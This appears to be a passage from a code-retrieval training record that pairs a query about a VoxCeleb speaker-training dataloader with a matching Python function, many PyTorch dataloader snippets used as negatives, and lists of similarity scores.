utilities.max_length_in_list(self.return_keys())\r\n if self.piDD[self.top_node] == None:\r\n self.dim = 0\r\n else:\r\n self.dim = self.piDD[self.top_node][0][0]", "def __init__(self):\n\n self.P = list()\n self.label = 0", "def __init__(self, radius=0.5, extra={}):\n self.radius = radius\n self.sensors = [] # array of Attached\n self.id_sensors = None\n self.id_dynamics = None # XXX\n self.dynamics = None\n self.extra = extra\n\n self.primitives = set()\n\n # Needs to be initialized before calling certain functions\n self._state = None", "def __init__(self):\n raise NotImplementedError('cannot create independent arc')", "def eta23pi ( self ) :\n from 
GaudiConfUtils.ConfigurableGenerators import DaVinci__N3BodyDecays\n ## \n pre_eta = self.make_selection (\n ## the unique tag \n 'PreEta3Pi' ,\n ## algorithm type to be used\n DaVinci__N3BodyDecays ,\n ## input selections \n [ self.pions () , self.pi0 () ] ,\n ## algorithm properties \n DecayDescriptor = \" eta -> pi+ pi- pi0\" ,\n ## \n Combination12Cut = \"\"\" ( AM < 700 * MeV ) &\n ( ACHI2DOCA(1,2) < 12 ) \n \"\"\" , \n ##\n CombinationCut = \"\"\"\n ( APT > %s ) & ( ADAMASS ( 'eta' ) < 100 * MeV )\n \"\"\" % ( 0.9 * self['ETA_PT'] ) ,\n ##\n MotherCut = \"\"\"\n ( PT > %s ) &\n ( chi2vx < 9 ) \n \"\"\" % self['ETA_PT']\n )\n ##\n from GaudiConfUtils.ConfigurableGenerators import Pi0Veto__Tagger2g\n ## \n return self.make_selection (\n 'Eta23pi' ,\n Pi0Veto__Tagger2g ,\n [ pre_eta ] ,\n MassWindow = 25 * MeV ,\n MassChi2 = -1 ,\n ExtraInfoIndex = 25016 ## unique ! \n )", "def _select(self):\n sel = []\n\n # choose randomly while favouring fit individuals\n lp = len(self.population) // 2\n for _ in range(lp):\n idx1 = idx2 = int(math.sqrt(random.randrange(lp**2+1)))\n while idx1 == idx2:\n idx2 = int(math.sqrt(random.randrange(lp**2+1)))\n\n p1, p2 = self.population[idx1], self.population[idx2]\n sel.append((p1, p2))\n\n return sel", "def __init__(self, d):\n\t\tself._coords = [0] * d", "def test_non_it(self):\n self.idx = [9, 11, 6, 10, 12, 2, 8, 1, 5, 0, 7, 4, 3]\n selector = PCovCUR(n_to_select=12, iterative=False)\n selector.fit(self.X, self.y)\n\n self.assertTrue(np.allclose(selector.selected_idx_, self.idx[:-1]))", "def __init__(self):\n\n # Assign a nullptr for the device-side pointers. These will be set if the GPU is utilized.\n self.ng = int(0)\n self.goals = ct.POINTER(ct.c_uint)()\n self.currentHorizon = int(0)\n self.V = ct.POINTER(ct.c_float)()\n self.VPrime = ct.POINTER(ct.c_float)()\n self.pi = ct.POINTER(ct.c_uint)()\n self.ne = int(0)\n self.expanded = ct.POINTER(ct.c_int)()\n self.d_goals = ct.POINTER(ct.c_uint)()\n self.d_S = ct.POINTER(ct.c_int)()\n self.d_T = ct.POINTER(ct.c_float)()\n self.d_R = ct.POINTER(ct.c_float)()\n self.d_V = ct.POINTER(ct.c_float)()\n self.d_VPrime = ct.POINTER(ct.c_float)()\n self.d_pi = ct.POINTER(ct.c_uint)()\n self.d_expanded = ct.POINTER(ct.c_int)()\n\n # Additional informative variables.\n self.Rmin = None\n self.Rmax = None", "def selected_choice(self):\r\n choice = zeros(self.num_agents)\r\n random_numbers = self.generate_random_numbers()\r\n\r\n self.prob_cumsum = self.cumprob().filled(-1)\r\n\r\n for i in range(self.num_choices):\r\n # Indicator for the zero cells in the choice array\r\n #indicator_zero_cells = ones(self.num_agents)\r\n indicator = array([True]*self.num_agents)\r\n\r\n zero_indices = choice == 0\r\n #indicator_zero_cells[~zero_indices] = ma.masked\r\n indicator[~zero_indices] = False\r\n\r\n # Indicator for the cells where the random number\r\n # is less than the probability\r\n #indicator_less_cells = ones(self.num_agents)\r\n #indicator_less_cells = array([True]*self.num_agents)\r\n less_indices = random_numbers < self.prob_cumsum[:,i]\r\n #indicator_less_cells[~less_indices] = ma.masked\r\n #indicator_less_cells\r\n indicator[~less_indices] = False\r\n\r\n\r\n #indicator_less_zero_cells = indicator_zero_cells + indicator_less_cells\r\n\r\n #indicator_less_zero_cells = indicator_less_zero_cells == 2\r\n\r\n choice[indicator] = i + 1\r\n\r\n choice.shape = (self.num_agents, 1)\r\n\r\n #alt_text = []\r\n #for i in choice:\r\n # alt_text.append(self.choices[int(i[0])-1])\r\n #alt_text = array(alt_text)\r\n 
#alt_text.shape = (self.num_agents, 1)\r\n\r\n #return alt_text\r\n #print choice\r\n return DataArray(choice, ['selected choice'])", "def __init__(self, analogue_selection='indep', clock_selection='in', cal_mode='no_cal', clk_speed=800):\n self.value = 0\n self.value |= (0b1 << 2) # disable chip version output bit\n self.value |= (0b1 << 3) # set demux to 1:2\n clk_bits = 0b00 if (clk_speed<125) else 0b01 if (clk_speed<250) else 0b10 if (clk_speed<500) else 0b11\n self.value |= (clk_bits << 12) # control wait bit calibration value is dependent on clk speed\n self.value |= (1 << 14) # set FDataReady to Fs/2. I don't know what this means\n self.set_analogue_selection(analogue_selection)\n self.set_clock_selection(clock_selection)\n self.set_cal_mode(cal_mode)", "def pi(self):\n return self(self._real_field().pi())", "def __init__(self):\n super().__init__()\n self.lambdaVar = 1.0\n self.low = 0.0\n self.type = 'Exponential'\n self.distType = 'Continuous'\n self.hasInfiniteBound = True\n self.compatibleQuadrature.append('CDF')\n self.preferredQuadrature = 'CDF'\n self.preferredPolynomials = 'CDF'", "def __init__(self, params):\r\n _params = {'Similarity': 0.97,\r\n 'Application': 'cdhit',\r\n 'Algorithm': 'cdhit: \"longest-sequence-first list removal algorithm\"'}\r\n _params.update(params)\r\n OtuPicker.__init__(self, _params)", "def __init__(self, goal=0, kP=1, kI=1, kD=1, init_pt=0):\n self._pid_lock = threading.Lock()\n\n self.set_goal(goal)\n self.reset(init_pt)\n self.set_gains({\n PIDController.KP_KEY: kP,\n PIDController.KI_KEY: kI,\n PIDController.KD_KEY: kD\n })", "def __init__(\n self, voltage={0:(0, 0)}, rate=500, repetitions=1,\n board_name='cDAQ1Mod1', voltage_limits=None, num_channels=7):\n self.board_name = board_name #Check Measurement and Automation Explorer\n self._taskHandle = ctypes.c_void_p(0)\n self.num_channels = num_channels\n DAQmxErrChk(api.DAQmxCreateTask(\"\", ctypes.byref(self._taskHandle)))\n DAQmxErrChk(api.DAQmxCreateAOVoltageChan(\n self._taskHandle,\n self.board_name + \"/ao0:%i\"%(num_channels - 1),\n \"\",\n ctypes.c_double(-10.0), #Minimum voltage\n ctypes.c_double(10.0), #Maximum voltage\n 10348, #DAQmx_Val_Volts; don't question it!\n ctypes.c_void_p(0), #NULL\n ))\n self.num_points_written = ctypes.c_long(0)\n self._unwritten_voltages = False\n self._unplayed_voltages = False\n self.set_voltage_and_timing(voltage, rate, repetitions, voltage_limits)\n return None", "def select(self):\n\n return self.p[0], self.p[1]", "def null(cls, d=2):\n return cls(*[0 for i in range(d)])", "def get_selection(self, selection_name, format=None):", "def __init__(self, pin1=24, pin2=28, pin3=25, pin4=33):\n self.GP = GPIOProcessor()\n self.pin1 = self.GP.getPin(pin1)\n self.pin2 = self.GP.getPin(pin2)\n self.pin3 = self.GP.getPin(pin3)\n self.pin4 = self.GP.getPin(pin4)\n self.pinl = [self.pin1, self.pin2, self.pin3, self.pin4]\n\n for k in range(4):\n self.pinl[k].out()\n\n self.speed = 100.0", "def circle(self):\n return circle(self.N, self.o, self.r)", "def p_selection(p_init, it, n_iters):\n it = int(it / n_iters * 10000)\n\n if 10 < it <= 50:\n p = p_init / 2\n elif 50 < it <= 200:\n p = p_init / 4\n elif 200 < it <= 500:\n p = p_init / 8\n elif 500 < it <= 1000:\n p = p_init / 16\n elif 1000 < it <= 2000:\n p = p_init / 32\n elif 2000 < it <= 4000:\n p = p_init / 64\n elif 4000 < it <= 6000:\n p = p_init / 128\n elif 6000 < it <= 8000:\n p = p_init / 256\n elif 8000 < it <= 10000:\n p = p_init / 512\n else:\n p = p_init\n\n return p", "def select_arm(self):\n\n # 
Exploitation\n if random.uniform(0, 1) > self.epsilon:\n return np.argmax(self.values)\n\n # Exploration\n else:\n return random.randrange(len(self.values))", "def pick(self):\n\n pickerdict = {}\n current_value = 0\n\n if len(self.choices) == 0:\n return None\n\n if len(self.choices) == 1:\n return self.choices[0][0]\n\n for option in self.choices:\n pickerdict[current_value] = option[0]\n current_value += option[1]\n\n picker = random.randint(0, current_value)\n last_value = 0\n result = None\n sorted_keys = sorted(pickerdict.keys())\n\n found = False\n for key in sorted_keys:\n if key >= picker:\n result = pickerdict[last_value]\n found = True\n continue\n last_value = key\n\n if not found:\n result = pickerdict[sorted_keys[-1]]\n\n return result", "def select(self):\n pass", "def select(self):\n pass", "def __init__(self, choice):\r\n self.choice = choice", "def make_car():\n car = Car() \n car.drop_val = random.randint(0,1)\n\n if car.drop_val == 0:\n car.drop_x = random.randint(77, 400) * 2\n\n elif car.drop_val == 1:\n car.drop_y = random.randint(62, 300) *2\n\n return car", "def __init__(self, D, K):\n\t\tself.D = D \n\t\tself.K = K \n\t\tself.V = np.zeros((D+1,K))\n\t\treturn", "def dropdown(self):\n # defaults = DDConfig(0.6, 0.6, 0, 0)\n return DropDown(self.name, self.command, **self.config)", "def __init__(self, inplace=False):\n super(SELU, self).__init__()\n self.inplace = inplace", "def __init__(self, motor, OD_range=None, motor_range=None,\n motor_min=None, OD_min=None, motor_max=None, OD_max=None):\n self.motor = motor\n if OD_range is not None:\n self.OD_range = OD_range\n if motor_range is not None:\n self.motor_range = motor_range\n\n if motor_min is not None:\n self.motor_min = motor_min\n else:\n self.motor_min = motor_range[0]\n\n if motor_max is not None:\n self.motor_max = motor_max\n else:\n self.motor_max = motor_range[1]\n\n if OD_min is not None:\n self.OD_min = OD_min\n else:\n self.OD_min = OD_range[0]\n\n if OD_max is not None:\n self.OD_max = OD_max\n else:\n self.OD_max = OD_range[1]", "def touching_choice(self,p):\n\n part = ['head', 'foot1', 'foot2', 'foot3', 'foot4', 'back', 'stomach', 'tail']\n if len(self.select[p]) == 0:\n return random.sample(part,2)\n elif len(self.select[p]) == 1:\n part.remove(self.select[p][0])\n c = random.sample(part,1)\n return [self.select[p][0], c[0]]\n else:\n return random.sample(self.select[p],2)", "def select(self):\r\n pass", "def __init__(self, r: float, i: float = 0):\n self.r = r\n self.i = i", "def __init__(self, tpose, mpose, tselect=[], mselect=[]):\n self.target = tpose\n self.mobile = mpose\n self.target_residues = res_selector_to_size_list(tselect)\n self.mobile_residues = res_selector_to_size_list(mselect)\n self.set_target_sequence()\n self.set_mobile_sequence()\n self.atoms = ['N','C','CA']\n self.bb_rmsd = None", "def create_soft_cluster():\n # node, index_component, inf_val = general.get_soft_selection()\n soft_element_data = general.get_soft_selection()\n selection = [vtx_component for vtx_component, inf_val in soft_element_data]\n\n pm.select(selection, r=True)\n cluster = pm.cluster(relative=True)\n\n for vtx_component, inf_val in soft_element_data:\n pm.percent(cluster[0], vtx_component, v=inf_val)\n pm.select(cluster[1], r=True)\n\n return cluster", "def __init__(self):\n {}\n #generate a monoid Q\n self.monoid_Q = self.generateQ()[0]\n self.relationOfElements_Q = self.generateQ()[1]\n self.p_Position = self.generateQ()[2]\n self.qOfPosition = self.generateQ()[3]\n #print(self.qOfPosition)", "def 
zero_val(self):\r\n self.piDD = {\"[0]\": None}\r\n self.top_node = \"[0]\"\r\n self.dim = 0", "def get_slider():\n return dcc.RangeSlider(\n id='hours',\n value=[0, 23],\n min=0,\n max=23,\n marks={i: str(i) for i in range(0, 24, 3)}\n )", "def choose_pos(self):\n s = self\n\n availablepos = []\n for dblock in s.pjs.dblocks:\n is_available = True\n\n for powerup in s.pjs.powerups:\n if powerup.rects[0].overlap(dblock.rects[0]):\n is_available = False\n break\n\n if is_available:\n availablepos.append(dblock.rpos)\n\n pos = random.randint(0, len(availablepos) - 1)\n s.rpos = availablepos[pos]", "def __init__(self):\n super().__init__()\n self.low = 0.0\n self.high = 1.0\n self.alpha = 0.0\n self.beta = 0.0\n self.type = 'Beta'\n self.distType = 'Continuous'\n self.hasInfiniteBound = True\n self.compatibleQuadrature.append('Jacobi')\n self.compatibleQuadrature.append('CDF')\n self.preferredQuadrature = 'Jacobi'\n self.preferredPolynomials = 'Jacobi'", "def selectPointsUnderCursor(self):\n spw = self.spw\n sw = spw.windows['Sort']\n #if clear:\n # sw.uslist.clearSelection()\n # sw.nlist.clearSelection()\n x, y = self.cursorPosGL()\n sids = self.pick(x, y, pb=10, multiple=True)\n if sids is None:\n return\n #t0 = time.time()\n spw.SelectSpikes(sids, on=self.selecting)\n #print('SelectSpikes took %.3f sec' % (time.time()-t0))\n if self.selecting == True:\n sat = 0.2 # desaturate\n else: # self.selecting == False\n sat = 1 # resaturate\n self.color(sids, sat=sat)\n self.updateGL()", "def selection(self) -> Chromosome:\n # each chromosome has a fitness, and the lower the fitness, the higher the probability of election\n choices_list = list(range(len(self._population)))\n weights = [1 / chromosome.get_fitness() for chromosome in self._population]\n\n index = choices(choices_list, weights=weights)[0]\n\n return self._population[index]", "def create_pressure_vessel_geometry():\r\n\r\n # configure sigmoid function\r\n bounds_upper = [3, 6]\r\n h = 5\r\n w = 6\r\n\r\n sigmoid_function = lambda x: (1 / (1 + np.exp(-1 * h * x + w))) + 1\r\n\r\n sigmoid_function_reverse = lambda x: 1 / (1 + np.exp(h * x - w - 18)) + 1\r\n\r\n funcs_upper = [sigmoid_function, sigmoid_function_reverse]\r\n\r\n bounds_lower = None\r\n funcs_lower = 0\r\n\r\n x_max = 6\r\n x_min = 0\r\n resolution = 10000\r\n\r\n pressure_vessel = Geometry(x_max, x_min, resolution,\r\n bounds_upper, funcs_upper,\r\n bounds_lower, funcs_lower)\r\n\r\n return pressure_vessel", "def random(cls, d=2, borns=[-1, 1], **kwargs):\n components = [random.uniform(*borns) for i in range(d)]\n return cls(*components, **kwargs)", "def random(cls, d=2, borns=[-1, 1], **kwargs):\n components = [random.uniform(*borns) for i in range(d)]\n return cls(*components, **kwargs)" ]
[ "0.65183586", "0.6036616", "0.58945334", "0.55806303", "0.5347493", "0.53058124", "0.5261733", "0.51529664", "0.50806415", "0.5059661", "0.50538725", "0.50354403", "0.5012788", "0.4933138", "0.49302754", "0.48780695", "0.48642525", "0.4854433", "0.4833495", "0.48240137", "0.4793768", "0.47933662", "0.478876", "0.47886172", "0.47840276", "0.47784555", "0.47292686", "0.47277686", "0.47275457", "0.4723399", "0.47140983", "0.46943375", "0.4684248", "0.4681723", "0.46263233", "0.46263233", "0.46263233", "0.46263233", "0.46263233", "0.46263233", "0.46263233", "0.46263233", "0.46263233", "0.46227065", "0.46197912", "0.4606822", "0.46054325", "0.46035653", "0.4589436", "0.45894", "0.45707285", "0.45663157", "0.45569476", "0.45543933", "0.45372185", "0.4531875", "0.45277584", "0.45277193", "0.4526098", "0.45167056", "0.45129544", "0.45127553", "0.44958597", "0.449459", "0.44927624", "0.44874167", "0.44785053", "0.447828", "0.44742787", "0.44716415", "0.4465707", "0.44648972", "0.44614938", "0.44611254", "0.44586134", "0.44572446", "0.44523677", "0.44516554", "0.44516554", "0.44455868", "0.44427782", "0.4439188", "0.4433058", "0.44299138", "0.44277158", "0.44272554", "0.44166902", "0.4415884", "0.44089264", "0.44023633", "0.43929407", "0.43907556", "0.43897092", "0.43888915", "0.43872088", "0.43813017", "0.4378417", "0.43783", "0.43780282", "0.43780282" ]
0.5167268
7
dataloader for training dataset via voxsampler.
def load_train(trainlst, traindir, maptrain5994, L=L, batch_size=batch_size, num_worker=num_worker, max_utt_per_spk=max_utt_per_spk, load_wav=None): if load_wav is None: def load_train_wav(path): return loadWAV(path, L=L, evalmode=False) else: load_train_wav = load_wav df_train = pd.read_csv(trainlst, sep=" ", header=None, names=["speaker", "file"]) df_train["file"] = df_train["file"].apply(lambda x: traindir + x) map_train = dict(pd.read_csv(maptrain5994, header=None).values) data = voxceleb2(df_train.values, map_train, load_train_wav) sampler = voxsampler(df_train, map_train, max_utt_per_spk=max_utt_per_spk, batch_size=batch_size) dataloader = DataLoader(data, batch_size=batch_size, num_workers=num_worker, shuffle=False, sampler=sampler) return dataloader
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def train_dataloader(self) -> torch.utils.data.DataLoader: \n return torch.utils.data.DataLoader(self.dataset_train, **self.dl_kwargs)", "def dataloader(self):\n\n # load / split data\n train_data = self.data.get_train_data()\n if self.args.use_dev:\n train_data, dev_data = self.data.split_data(train_data)\n test_data = self.data.get_test_data()\n\n #print(train_data[0])\n #print(dev_data[0])\n #print(test_data[0])\n\n # build dataset\n train_dataset = self.loader.build_dataset(\n train_data, \n self.args.train_max_seq_len)\n train_loader = self.loader.build_dataloader(\n train_dataset, 'train')\n\n test_dataset = self.loader.build_dataset(\n test_data,\n self.args.eval_max_seq_len)\n test_loader = self.loader.build_dataloader(\n test_dataset, 'test')\n\n if self.args.use_dev:\n dev_dataset = self.loader.build_dataset(\n dev_data,\n self.args.eval_max_seq_len)\n dev_loader = self.loader.build_dataloader(\n dev_dataset, 'dev')\n return train_loader, dev_loader, test_loader\n else:\n return train_loader, test_loader", "def test_dataloader(self) -> torch.utils.data.DataLoader: \n return torch.utils.data.DataLoader(self.dataset_test, **self.dl_kwargs)", "def train_dataloader(self) -> DataLoader:\n return self._custom_data_loader()", "def train_dataloader(self):\r\n\r\n # transformation\r\n train_transform = Compose(\r\n [\r\n ApplyTransformToKey(\r\n key='video',\r\n transform=Compose(\r\n [\r\n UniformTemporalSubsample(8),\r\n Lambda(lambda x: x / 255.0),\r\n Normalize((0.45, 0.45, 0.45), (0.225, 0.225, 0.225)),\r\n RandomShortSideScale(min_size=256, max_size=320),\r\n RandomCrop(244),\r\n RandomHorizontalFlip(p=0.5),\r\n ]\r\n )\r\n )\r\n ]\r\n )\r\n\r\n train_dataset = pv.data.Kinetics(\r\n data_path=os.path.join(self._DATA_PATH, \"train\"),\r\n clip_sampler=pv.data.make_clip_sampler(\"random\", self._CLIP_DURATION),\r\n decode_audio=False,\r\n transform=train_transform\r\n )\r\n return torch.utils.data.DataLoader(\r\n train_dataset,\r\n batch_size=self._BATCH_SIZE,\r\n num_workers=self._NUM_WORKERS,\r\n )", "def train_dataloader(self) -> DataLoader:\n return DataLoader(\n self.train_dataset,\n batch_size=self.hparams.batch_size,\n shuffle=True,\n num_workers=multiprocessing.cpu_count(),\n )", "def val_dataloader(self) -> torch.utils.data.DataLoader: \n return torch.utils.data.DataLoader(self.dataset_valid, **self.dl_kwargs)", "def create_dataloader(data):\r\n input_ids = torch.LongTensor([sent['input_ids'] for sent in data])\r\n input_mask = torch.LongTensor([sent['input_mask'] for sent in data])\r\n segment_ids = torch.LongTensor([sent['segment_ids'] for sent in data])\r\n label_ids = torch.LongTensor([sent['label_ids'] for sent in data])\r\n\r\n dataset = TensorDataset(input_ids, input_mask, segment_ids, label_ids)\r\n\r\n train_sampler = RandomSampler(dataset)\r\n dataloader = DataLoader(dataset, sampler=train_sampler, batch_size=BATCH_SIZE)\r\n\r\n return dataloader", "def dataloader(self):\n return DataLoader", "def dataloader_vatexEnglish_train(args, tokenizer):\n\n vatexEnglish_dataset = VATEXENGLISH_multi_sentence_dataLoader(\n subset=\"train\",\n data_path=args.data_path,\n features_path=args.features_path,\n max_words=args.max_words,\n feature_framerate=args.feature_framerate,\n tokenizer=tokenizer,\n max_frames=args.max_frames,\n )\n\n train_sampler = torch.utils.data.distributed.DistributedSampler(vatexEnglish_dataset)\n\n dataloader = DataLoader(\n vatexEnglish_dataset,\n batch_size=args.batch_size // args.n_gpu,\n num_workers=args.num_thread_reader,\n pin_memory=False,\n 
shuffle=(train_sampler is None),\n sampler=train_sampler,\n drop_last=True,\n )\n\n return dataloader, len(vatexEnglish_dataset), train_sampler", "def _get_dataloader(samples, batch_size):\n print(\"Cogiendo dataloader\")\n return DataLoader(samples, shuffle=True, batch_size=batch_size)", "def test_dataloader(self) -> data.DataLoader:\n return data.DataLoader(dataset=self.datasets['test'], batch_size=self.batch_size,\n num_workers=self.num_workers, shuffle=False, pin_memory=False)", "def create_train_dataloader(configs):\n train_lidar_aug = OneOf([\n Random_Rotation(limit_angle=np.pi / 4, p=1.0),\n Random_Scaling(scaling_range=(0.95, 1.05), p=1.0),\n ], p=0.66)\n train_dataset = KittiDataset(configs, mode='train', lidar_aug=train_lidar_aug, hflip_prob=configs.hflip_prob,\n num_samples=configs.num_samples)\n train_sampler = None\n if configs.distributed:\n train_sampler = torch.utils.data.distributed.DistributedSampler(train_dataset)\n train_dataloader = DataLoader(train_dataset, batch_size=configs.batch_size, shuffle=(train_sampler is None),\n pin_memory=configs.pin_memory, num_workers=configs.num_workers, sampler=train_sampler)\n\n return train_dataloader, train_sampler", "def _init_train_loader(self):\n # Choose the right dataset type\n if self.config_args[\"num_members\"] > 1:\n class_dataset_wrapper = dataset_wrapper.MixMoDataset\n else:\n class_dataset_wrapper = dataset_wrapper.MSDADataset\n\n # Load augmentations\n self.traindatasetwrapper = class_dataset_wrapper(\n dataset=self.train_dataset,\n num_classes=int(self.config_args[\"data\"][\"num_classes\"]),\n num_members=self.config_args[\"num_members\"],\n dict_config=self.config_args[\"training\"][\"dataset_wrapper\"],\n properties=self.properties\n )\n\n # Build standard sampler\n _train_sampler = torch.utils.data.sampler.RandomSampler(\n data_source=self.traindatasetwrapper, ## only needed for its length\n num_samples=None,\n replacement=False,\n )\n\n # Wrap it with the repeating sampler used for multi-input models\n batch_sampler = batch_repetition_sampler.BatchRepetitionSampler(\n sampler=_train_sampler,\n batch_size=self.batch_size,\n num_members=self.config_args[\"num_members\"],\n drop_last=True,\n config_batch_sampler=self.config_args[\"training\"][\"batch_sampler\"]\n )\n\n self.train_loader = torch.utils.data.DataLoader(\n self.traindatasetwrapper,\n batch_sampler=batch_sampler,\n num_workers=self.num_workers,\n batch_size=1,\n shuffle=False,\n sampler=None,\n drop_last=False,\n pin_memory=True,\n )", "def prepare_dataloader(opt, dataobj):\n\n def load_data(name):\n with open(name, 'rb') as f:\n data = pickle.load(f)\n num_types = 1 # There is no event type prediction, hence using a dummy value, this will basically be a constant value field\n return data, num_types\n\n print('[Info] Loading train data...')\n train_data, num_types = load_data(opt.data + 'train_ny.pkl')\n print('[Info] Loading dev data...')\n val_data, _ = load_data(opt.data + 'val_ny.pkl')\n print('[Info] Loading test data...')\n test_data, _ = load_data(opt.data + 'test_ny.pkl')\n\n trainloader = get_dataloader(train_data, opt.batch_size, shuffle=True)\n validationloader = get_dataloader(val_data, opt.batch_size, shuffle=True)\n testloader = get_dataloader(test_data, opt.batch_size, shuffle=False)\n return trainloader, validationloader, testloader, num_types", "def dataloader_msvd_train(args, tokenizer):\n\n msvd_dataset = MSVD_multi_sentence_dataLoader(\n subset=\"train\",\n data_path=args.data_path,\n features_path=args.features_path,\n 
max_words=args.max_words,\n feature_framerate=args.feature_framerate,\n tokenizer=tokenizer,\n max_frames=args.max_frames,\n )\n\n train_sampler = torch.utils.data.distributed.DistributedSampler(msvd_dataset)\n\n dataloader = DataLoader(\n msvd_dataset,\n batch_size=args.batch_size // args.n_gpu,\n num_workers=args.num_thread_reader,\n pin_memory=False,\n shuffle=(train_sampler is None),\n sampler=train_sampler,\n drop_last=True,\n )\n\n return dataloader, len(msvd_dataset), train_sampler", "def test_dataloader(self) -> DataLoader:\n return DataLoader(\n self.test_dataset,\n batch_size=self.hparams.batch_size,\n shuffle=False,\n num_workers=multiprocessing.cpu_count(),\n )", "def build_dataloader(bs, shfle):\n # change get_labels to correct version (classification vs regression)\n dataset = TensorDataset(rand_data(), get_labels())\n dataset = TensorDataset(rand_data(), get_regression_labels())\n\n return DataLoader(dataset, batch_size=bs, shuffle=shfle, num_workers=0)", "def data_loader(data, train=True):\n\n loader_config = {\n 'batch_size':64,\n 'shuffle':train\n }\n \n return torch.utils.data.DataLoader(data, **loader_config)", "def get_dataloaders(logging, batch_size):\n # Load Data\n logging.info(\"Reading Train and Test data...\")\n train_df = pd.read_csv(\"C:/tmp/avila_classification/data/avila-tr.txt\", header=None)\n test_df = pd.read_csv(\"C:/tmp/avila_classification/data/avila-ts.txt\", header=None)\n\n # Fix column names\n col_names = ['col_' + str(j + 1) for j in range(train_df.shape[1] - 1)]\n indep_cols = col_names.copy()\n col_names.append('y')\n\n logging.debug(\"Assigning columns\")\n train_df.columns = col_names\n test_df.columns = col_names\n\n # Encode dependent variable column\n le = LabelEncoder()\n le.fit(train_df['y'])\n logging.debug(f\"Classes: {le.classes_}\")\n logging.debug(f\"Transformed Classes: {le.transform(le.classes_)}\")\n\n train_df['y_enc'] = le.transform(train_df['y'])\n test_df['y_enc'] = le.transform(test_df['y'])\n\n # train_df.head()\n logging.debug(f\"Shape of train data: {train_df.shape}\")\n logging.debug(f\"Shape of test data: {test_df.shape}\")\n\n # Create train and validation dataloaders\n train_ds = AvilaDataset(data_frame=train_df, indep_cols=indep_cols, dep_col='y_enc')\n valid_ds = AvilaDataset(data_frame=test_df, indep_cols=indep_cols, dep_col='y_enc')\n\n # Should be some exponent of 2 (128, 256)\n # batch_size = 256\n train_dl = DataLoader(train_ds, batch_size=batch_size, shuffle=True)\n valid_dl = DataLoader(valid_ds, batch_size=batch_size, shuffle=False)\n\n return train_dl, valid_dl, le", "def train_dataloader(self) -> data.DataLoader:\n # Random weighted sampler to approach the imbalanced dataset\n self.weights = [1.0 / i for i in self.weights]\n\n _sample_weights = [0] * len(self.datasets['train'])\n\n for idx, (_, label) in enumerate(self.datasets['train']):\n _weight = self.weights[label]\n _sample_weights[idx] = _weight\n\n random_sampler = data.WeightedRandomSampler(_sample_weights,\n len(self.datasets['train']), replacement=False)\n\n return data.DataLoader(dataset=self.datasets['train'], batch_size=self.batch_size,\n num_workers=self.num_workers, pin_memory=False,\n sampler=random_sampler)", "def get_loader(split):\n assert split in ['train', 'val', 'trainval', 'test']\n image_feature_path = config.rcnn_trainval_path if split != 'test' else config.rcnn_test_path\n dataset = VQAFeatureDataset(\n split,\n image_feature_path,\n )\n loader = torch.utils.data.DataLoader(\n dataset,\n batch_size=512,\n shuffle=True if split not 
in ['val', 'test'] else False, # only shuffle the data in training\n pin_memory=True,\n num_workers=config.workers,\n )\n return loader", "def get_dataloader(dataset, datadir, train_bs, test_bs, dataidxs=None, noise_level=0, net_id=None, total=0):\n if dataset in ('mnist', 'femnist', 'fmnist', 'cifar10','cifar100', 'svhn', 'generated', 'covtype', 'a9a', 'rcv1', 'SUSY','tinyimagenet'):\n if dataset == 'mnist':\n dl_obj = MNIST_truncated\n\n transform_train = transforms.Compose([\n transforms.ToTensor(),\n AddGaussianNoise(0., noise_level, net_id, total)])\n\n transform_test = transforms.Compose([\n transforms.ToTensor(),\n AddGaussianNoise(0., noise_level, net_id, total)])\n\n elif dataset == 'femnist':\n dl_obj = FEMNIST\n transform_train = transforms.Compose([\n transforms.ToTensor(),\n AddGaussianNoise(0., noise_level, net_id, total)])\n transform_test = transforms.Compose([\n transforms.ToTensor(),\n AddGaussianNoise(0., noise_level, net_id, total)])\n\n elif dataset == 'fmnist':\n dl_obj = FashionMNIST_truncated\n transform_train = transforms.Compose([\n transforms.ToTensor(),\n AddGaussianNoise(0., noise_level, net_id, total)])\n transform_test = transforms.Compose([\n transforms.ToTensor(),\n AddGaussianNoise(0., noise_level, net_id, total)])\n\n elif dataset == 'svhn':\n dl_obj = SVHN_custom\n transform_train = transforms.Compose([\n transforms.ToTensor(),\n AddGaussianNoise(0., noise_level, net_id, total)])\n transform_test = transforms.Compose([\n transforms.ToTensor(),\n AddGaussianNoise(0., noise_level, net_id, total)])\n\n\n elif dataset == 'cifar10':\n dl_obj = CIFAR10_truncated\n\n transform_train = transforms.Compose([\n transforms.ToTensor(),\n transforms.Lambda(lambda x: F.pad(\n Variable(x.unsqueeze(0), requires_grad=False),\n (4, 4, 4, 4), mode='reflect').data.squeeze()),\n transforms.ToPILImage(),\n transforms.RandomCrop(32),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n AddGaussianNoise(0., noise_level, net_id, total)\n ])\n # data prep for test set\n transform_test = transforms.Compose([\n transforms.ToTensor(),\n AddGaussianNoise(0., noise_level, net_id, total)])\n \n elif dataset == 'cifar100':\n dl_obj = CIFAR100_truncated\n\n normalize = transforms.Normalize(mean=[0.5070751592371323, 0.48654887331495095, 0.4409178433670343],\n std=[0.2673342858792401, 0.2564384629170883, 0.27615047132568404])\n # transform_train = transforms.Compose([\n # transforms.RandomCrop(32),\n # transforms.RandomHorizontalFlip(),\n # transforms.ToTensor(),\n # normalize\n # ])\n transform_train = transforms.Compose([\n # transforms.ToPILImage(),\n transforms.RandomCrop(32, padding=4),\n transforms.RandomHorizontalFlip(),\n transforms.RandomRotation(15),\n transforms.ToTensor(),\n normalize\n ])\n # data prep for test set\n transform_test = transforms.Compose([\n transforms.ToTensor(),\n normalize])\n\n elif dataset == 'tinyimagenet': \n # random_ids = np.random.randint(1000, size=datasize)\n # train_indices = random_ids\n\n imagenet_mean = [0.485, 0.456, 0.406]\n imagenet_std = [0.229, 0.224, 0.225]\n\n train_dl = torch.utils.data.DataLoader(\n torchvision.datasets.ImageFolder(datadir +\"/train\",\n transform=transforms.Compose([\n transforms.Resize(32), \n transforms.ToTensor(),\n # Phuong 09/26 change (mean, std) -> same as pretrained imagenet\n transforms.Normalize(mean=imagenet_mean, std=imagenet_std)])),\n #Phuong 09/26 drop_last=False -> True\n batch_size=train_bs, drop_last=True)\n \n test_dl = torch.utils.data.DataLoader(\n torchvision.datasets.ImageFolder(datadir 
